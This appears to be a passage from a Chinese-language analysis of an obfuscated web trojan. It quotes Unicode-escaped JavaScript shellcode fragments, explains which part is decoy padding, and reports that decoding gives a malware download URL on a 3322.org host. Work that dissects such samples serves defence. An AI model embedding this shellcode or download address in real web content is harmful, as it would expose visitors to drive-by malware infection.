'ADB7%u3D45%u126'+WMAHWM+'8EE';
var ANHEI=oaho+'#####%ud5db%uc9c9%u87cd%u9292%ud3d7%uc4c9%u9388%u8e8e%u8f8f%ud293%udacf%u8f87%u9285%uc593%ud0dc%ubdd1%ubdbd%ubdbd'######;
####号之间这段shellcode基本就是网马地址,其它之前的oaho其实基本就是干扰。
WMAHWM=X%XXXX%XXXX%X 也会隐藏在那个eval解出来的东西里~
把##之间这段放到freshow里shellcode解密得到:
'f[url]http://jnty5.3322.org:28/.xaml'[/url]